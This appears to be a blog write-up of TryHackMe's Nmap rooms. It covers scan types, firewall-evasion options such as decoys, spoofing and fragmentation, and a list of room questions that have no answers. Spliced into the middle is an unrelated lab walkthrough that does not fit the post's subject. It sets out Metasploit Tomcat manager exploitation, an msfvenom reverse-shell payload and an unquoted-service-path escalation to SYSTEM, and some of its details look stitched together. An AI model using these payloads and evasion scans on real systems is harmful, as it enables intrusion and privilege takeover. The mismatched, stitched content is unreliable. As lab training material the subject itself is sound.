Summary

In this post, we covered Nmap scanning commands and techniques from beginners to advanced. We explained TCP connect scan, stealth scan, UDP scan, ACK scan, Decoy scan, Fragmented scan,etc. This was part of TryHackMe Junior Penetration Tester pathway.

This post covers the answers for

  1. Nmap Live Host Discovery
  2. Nmap Basic Port Scans
  3. Nmap Advanced Port Scans
  4. Nmap Post Port Scans

Challenge Description

When we want to target a network, we want to find an efficient tool to help us handle repetitive tasks and answer the following questions:

  1. Which systems are up?
  2. What services are running on these systems?

The tool that we will rely on is Nmap. The first question about finding live computers is answered in this room. This room is the first in a series of four rooms dedicated to Nmap. The second question about discovering running services is answered in the next Nmap rooms that focus on port-scanning.

Initial Reconnaissance and Web Exploitation

I started by running an Nmap scan to identify open ports on the target machine. My scan revealed several open ports, including 80 (HTTP), 135 (RPC), 139 (NetBIOS), 445 (SMB), and 8080 (HTTP). The presence of ports 135, 139, and 445 immediately told me it was a Windows machine.

I then navigated to the website on port 80, which was a static page. However, when I checked port 8080, I found a web server running Apache Tomcat/8.5.31. This was a promising lead! I noticed that the default Tomcat page was displayed, which often includes a “Manager App” link.

I tried to access the /manager/html directory, but it required authentication. This is a common scenario, so I decided to look for default credentials or vulnerabilities in Tomcat. I remembered that Tomcat versions can sometimes be vulnerable to specific exploits.

I used Metasploit’s exploit/multi/http/tomcat_mgr_upload module to try and gain access. This module attempts to upload a malicious .war file (Web Application Archive) to the Tomcat Manager. I set the RHOSTS to the target IP, RPORT to 8080, and LHOST to my attacking machine’s IP. I also needed to set LPORT for my reverse shell. After running the exploit, it successfully uploaded the .war file and gave me a meterpreter session!

  • Commands in Metasploit:
    • use exploit/multi/http/tomcat_mgr_upload
    • set RHOSTS <TARGET_IP>
    • set RPORT 8080
    • set LHOST <YOUR_IP>
    • set LPORT 4444 (or any chosen port)
    • exploit

Initial Foothold and User Flag

Once I had the meterpreter session, I could interact with the compromised system. I used the shell command to drop into a Windows command prompt.

  • Command in Meterpreter:
    • shell

From the command prompt, I wanted to find the user flag. I navigated to the Users directory and then to the bill user’s desktop.

  • Commands in Windows Shell:
    • cd Users
    • cd bill
    • cd Desktop
    • type user.txt (This command is used to display the contents of user.txt, revealing the user flag.)

Privilege Escalation

Now that I had the user flag, my next objective was to escalate privileges to administrator. I needed to find a vulnerability that would allow me to move from the bill user to a higher-privileged account.

I used systeminfo to gather information about the system, specifically the OS version and installed hotfixes.

  • Command in Windows Shell:
    • systeminfo

I then transferred winPEAS.exe (a privilege escalation enumeration tool) to the target machine using the upload command in Meterpreter.

  • Command in Meterpreter:
    • upload /path/to/your/winPEAS.exe C:\\Users\\bill\\Desktop\\winPEAS.exe

After running winPEAS.exe on the target, it highlighted a potential vulnerability related to unquoted service paths. This is a common issue where a service executable’s path isn’t enclosed in quotes, allowing an attacker to inject their own executable if they can write to a directory within that path.

  • Command in Windows Shell (to run winPEAS):
    • C:\Users\bill\Desktop\winPEAS.exe

I identified the AdvancedSystemCareService9 as having an unquoted path. Its path was C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe. This meant I could potentially place a malicious executable named Program.exe in C:\Program Files (x86)\IObit\ and it would be executed when the service started.

I generated a malicious .exe payload using msfvenom to get a reverse shell as a higher-privileged user.

  • Command in Kali Linux:
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=5555 -f exe -o Program.exe

I then uploaded this Program.exe to C:\Program Files (x86)\IObit\ on the target machine using Meterpreter’s upload command.

  • Command in Meterpreter:
    • upload /path/to/your/Program.exe "C:\\Program Files (x86)\\IObit\\Program.exe"

Before restarting the service, I set up a new multi/handler in Metasploit to catch the incoming shell from my malicious Program.exe.

  • Commands in Metasploit:
    • use exploit/multi/handler
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST <YOUR_IP>
    • set LPORT 5555
    • exploit

Finally, I restarted the AdvancedSystemCareService9 service. This caused my Program.exe to execute, and I caught a new meterpreter session, this time as NT AUTHORITY\SYSTEM (full administrator privileges)!

  • Command in Windows Shell (to restart service):
    • sc stop AdvancedSystemCareService9
    • sc start AdvancedSystemCareService9

Root Flag Retrieval

With full system access, I could now retrieve the root flag. I navigated to the Administrator’s desktop.

  • Commands in new Meterpreter session:
    • shell
    • cd C:\Users\Administrator\Desktop
    • type root.txt (This command displayed the contents of root.txt, revealing the root flag.)

This challenge was a great exercise in combining web exploitation with Windows privilege escalation techniques. I just finished watching a video that dives deep into Nmap scanning techniques, revisiting the Junior Penetration Tester pathway on TryHackMe. I focused on the practical commands and concepts rather than just the theory. Here’s a breakdown of what I covered:

Nmap Scanning Techniques

TCP Connect Scan (-sT)

This is the default scan type if I’m not running as root. It completes the full TCP three-way handshake, making it easily detectable by firewalls and administrators. It doesn’t require elevated privileges.

  • Command: nmap -sT [IP_ADDRESS]

Stealth Scan / SYN Scan (-sS)

This scan requires root privileges. It’s considered stealthier because it doesn’t complete the full TCP handshake. Instead, after receiving a SYN-ACK, it sends a RST packet to tear down the connection.

  • Command: sudo nmap -sS [IP_ADDRESS]

UDP Scan (-sU)

I use this to scan UDP ports. It’s trickier to determine port status with UDP because it’s connectionless. If a port is closed, the target usually responds with an ICMP “port unreachable” message. If there’s no response, the port is considered open or filtered.

  • Command: nmap -sU [IP_ADDRESS] or nmap -sU -F [IP_ADDRESS] (for a faster scan of common ports).

Timing (-T)

This option controls the speed of the scan. Options range from -T0 (paranoid, very slow for IDS/firewall evasion) to -T5 (insane, very fast and noisy). I can also use --min-rate and --max-rate to control packets per second.

Null Scan (-sN)

This sends TCP packets with no flags set. If a port is open or filtered, there’s no response. If it’s closed, the target sends a RST packet.

  • Command: nmap -sN [IP_ADDRESS]

FIN Scan (-sF)

Similar to a Null scan, this sends TCP packets with only the FIN flag set. It behaves similarly in terms of responses for open/filtered and closed ports.

  • Command: nmap -sF [IP_ADDRESS]

Xmas Scan (-sX)

This sends TCP packets with FIN, PSH, and URG flags set. Like Null and FIN scans, its behavior helps in understanding firewall rules.

  • Command: nmap -sX [IP_ADDRESS]

ACK Scan (-sA)

I use this to map out firewall rule sets by sending TCP packets with only the ACK flag set. The target should always respond with a RST packet. Nmap considers a port “unfiltered” if a RST is received, and “filtered” if no response comes back.

  • Command: nmap -sA [IP_ADDRESS]

Window Scan (-sW)

Similar to the ACK scan, this can sometimes differentiate open ports from closed ones by examining the TCP window field in the returned RST packet.

  • Command: nmap -sW [IP_ADDRESS]

Custom TCP Scan Flags (--scanflags)

This allows me to specify custom TCP flags. For example, to set only the RST flag:

  • Command: nmap --scanflags RST [IP_ADDRESS]

Firewall Evasion Techniques

I explored several ways to evade firewalls:

  • Fragmentation (-f, -ff): Splits the TCP header into smaller packets. -f uses 8-byte fragments, -ff uses 16-byte fragments.
    • Command: nmap -sS -T1 -f [IP_ADDRESS]
    • Command: nmap -ff [IP_ADDRESS]
  • Decoy Scan (-D): Makes the scan appear to originate from multiple IP addresses.
    • Command: nmap -D RND:10 [IP_ADDRESS] (uses 10 random IPs)
    • Command: nmap -D decoy_ip1,decoy_ip2,ME [IP_ADDRESS] (ME represents my actual IP)
  • Spoof Source IP (-S): Makes the scan appear to come from a single, specific spoofed IP. This requires being on the same network or using a sniffer on the spoofed host to see results.
    • Command: nmap -e [INTERFACE] -Pn -S spoofed_ip [TARGET_IP]
  • Spoof MAC Address (--spoof-mac): Used to change the source MAC address.
  • Source Port Specification (--source-port or -g): Specifies the source port Nmap uses.
  • Idle Scan (-sI): A very stealthy scan that bounces off a “zombie” host.
  • Changing User Agent (--script-args http.useragent="USER_AGENT_STRING"): Can be used with HTTP scripts to change the user agent.
    • Command: nmap -sV --script http-headers --script-args http.useragent="Googlebot" [IP_ADDRESS]

Service and OS Detection

  • Service Version Detection (-sV): Attempts to determine the version of services running on open ports. It completes the TCP three-way handshake, so it doesn’t work with stealth scans (-sS) by default. I can control its intensity with --version-intensity [0-9] or use --version-light.
    • Command: nmap -sV [IP_ADDRESS]
  • OS Detection (-O): Attempts to identify the operating system of the target by fingerprinting its TCP/IP stack characteristics.
    • Command: nmap -O [IP_ADDRESS]

Nmap Scripting Engine (NSE)

The Nmap Scripting Engine (NSE) uses Lua scripts to extend Nmap’s functionality for tasks like vulnerability scanning, brute-forcing, and advanced discovery. Scripts are located in /usr/share/nmap/scripts/.

  • Default scripts (-sC or --script default): Runs a safe set of default scripts.
    • Command: nmap --script default [IP_ADDRESS]
    • Command: nmap -sC [IP_ADDRESS]
  • Specific script: I can run a specific script by name.
    • Example: nmap --script ssh2-enum-algos [IP_ADDRESS]
  • I used ls /usr/share/nmap/scripts/ | grep robots to find a script related to robots.txt and ls /usr/share/nmap/scripts/ | grep 2020-0712 for a specific CVE.

Saving Output

Finally, I learned how to save Nmap’s output in various formats:

  • Normal format (-oN): Human-readable.
    • Command: nmap -sV [IP_ADDRESS] -oN output.nmap
  • Grepable format (-oG): Easy to parse with tools like grep.
    • Command: nmap -sV [IP_ADDRESS] -oG output.gnmap
    • I used cat scans.gnmap | grep https and cat scans.gnmap | grep 8089 to filter results.
  • XML format (-oX): Useful for processing with other programs.
    • Command: nmap -sV [IP_ADDRESS] -oX nmap.xml
  • All formats (-oA): Saves in all three formats using the same base filename.

I’ll be moving on to the “Protocols and Servers” rooms next to complete the Junior Penetration Tester track!

TryHackMe Nmap Answers

How many devices can see the ARP Request?

Did computer6 reply to the ARP Request? (Y/N)

What is the first IP address Nmap would scan if you provided 10.10.12.13/29 as your target?

How many IP addresses will Nmap scan if you provide the following range 10.10.0-255.101-125?

Send a packet with the following:

  • From computer1
  • To computer3
  • Packet Type: “Ping Request”

What is the type of packet that computer1 sent before the ping?

What is the type of packet that computer1 received before being able to send the ping?

How many computers responded to the ping request?

Send a packet with the following:

  • From computer2
  • To computer5
  • Packet Type: “Ping Request”

What is the name of the first device that responded to the first ARP Request?

What is the name of the first device that responded to the second ARP Request?

Send another Ping Request. Did it require new ARP Requests? (Y/N)

We will be sending broadcast ARP Requests packets with the following options:

 

 

  • From computer1
  • To computer1 (to indicate it is broadcast)
  • Packet Type: “ARP Request”
  • Data: try all the possible eight devices (other than computer1) in the network: computer2, computer3, computer4, computer5, computer6, switch1, switch2, and router.

How many devices are you able to discover using ARP requests?

What is the option required to tell Nmap to use ICMP Timestamp to discover live hosts?

What is the option required to tell Nmap to use ICMP Address Mask to discover live hosts?

What is the option required to tell Nmap to use ICMP Echo to discover life hosts?

Which TCP ping scan does not require a privileged account?

Which TCP ping scan requires a privileged account?

What option do you need to add to Nmap to run a TCP SYN ping scan on the telnet port?

We want Nmap to issue a reverse DNS lookup for all the possibles hosts on a subnet, hoping to get some insights from the names. What option should we add?
Which service uses UDP port 53 by default?

Which service uses TCP port 22 by default?

How many port states does Nmap consider?

Which port state is the most interesting to discover as a pentester?

What 3 letters represent the Reset flag?

Which flag needs to be set when you initiate a TCP connection (first packet of TCP 3-way handshake)?

Launch the VM. Open the AttackBox and execute nmap -sT MACHINE_IP via the terminal. A new service has been installed on this VM since our last scan. Which port number was closed in the scan above but is now open on this target VM?

What is Nmap’s guess about the newly installed service?

Launch the VM. Some new server software has been installed since the last time we scanned it. On the AttackBox, use the terminal to execute nmap -sS MACHINE_IP. What is the new open port?

What is Nmap’s guess of the service name?

Launch the VM. On the AttackBox, use the terminal to execute nmap -sU -F -v MACHINE_IP. A new service has been installed since the last scan. What is the UDP port that is now open?

What is the service name according to Nmap?

What is the option to scan all the TCP ports between 5000 and 5500?

How can you ensure that Nmap will run at least 64 probes in parallel?

What option would you add to make Nmap very slow and paranoid?

In a null scan, how many flags are set to 1?

In a FIN scan, how many flags are set to 1?

In a Xmas scan, how many flags are set to 1?

Start the VM and load the AttackBox. Once both are ready, open the terminal on the AttackBox and use nmap to launch a FIN scan against the target VM. How many ports appear as open|filtered?

Repeat your scan launching a null scan against the target VM. How many ports appear as open|filtered?

In the Maimon scan, how many flags are set?
In TCP Window scan, how many flags are set?

You decided to experiment with a custom TCP scan that has the reset flag set. What would you add after --scanflags?

The VM received an update to its firewall ruleset. A new port is now allowed by the firewall. After you make sure that you have terminated the VM from Task 2, start the VM for this task. Launch the AttackBox if you haven’t done that already. Once both are ready, open the terminal on the AttackBox and use Nmap to launch an ACK scan against the target VM. How many ports appear unfiltered?

What is the new port number that appeared?

Is there any service behind the newly discovered port number? (Y/N)

What do you need to add to the command sudo nmap MACHINE_IP to make the scan appear as if coming from the source IP address 10.10.10.11 instead of your IP address?

What do you need to add to the command sudo nmap MACHINE_IP to make the scan appear as if coming from the source IP addresses 10.10.20.21 and 10.10.20.28 in addition to your IP address?

If the TCP segment has a size of 64, and -ff option is being used, how many IP fragments will you get?
You discovered a rarely-used network printer with the IP address 10.10.5.5, and you decide to use it as a zombie in your idle scan. What argument should you add to your Nmap command?
Launch the AttackBox if you haven’t done so already. After you make sure that you have terminated the VM from Task 4, start the VM for this task. Wait for it to load completely, then open the terminal on the AttackBox and use Nmap with nmap -sS -F --reason MACHINE_IP to scan the VM. What is the reason provided for the stated port(s) being open?

Start the target machine for this task and launch the AttackBox. Run nmap -sV --version-light MACHINE_IPvia the AttackBox. What is the detected version for port 143?

Which service did not have a version detected with --version-light?
Run nmap with -O option against MACHINE_IP. What OS did Nmap detect?
Knowing that Nmap scripts are saved in /usr/share/nmap/scripts on the AttackBox. What does the script http-robots.txt check for?

Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-2015-1635)?

Launch the AttackBox if you haven’t already. After you ensure you have terminated the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC against MACHINE_IP. You will notice that there is a service listening on port 53. What is its full version value?

Based on its description, the script ssh2-enum-algos “reports the number of algorithms (for encryption, compression, etc.) that the target SSH2 server offers.” What is the name of the key exchange algorithms (kex_algorithms) that relies upon “sha1” and is supported by MACHINE_IP?

Terminate the target machine of the previous task and start the target machine for this task. On the AttackBox terminal, issue the command scp pentester@MACHINE_IP:/home/pentester/* . to download the Nmap reports in normal and grepable formats from the target virtual machine.

Note that the username pentester has the password THM17577

Check the attached Nmap logs. How many systems are listening on the HTTPS port?

What is the IP address of the system listening on port 8089?

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles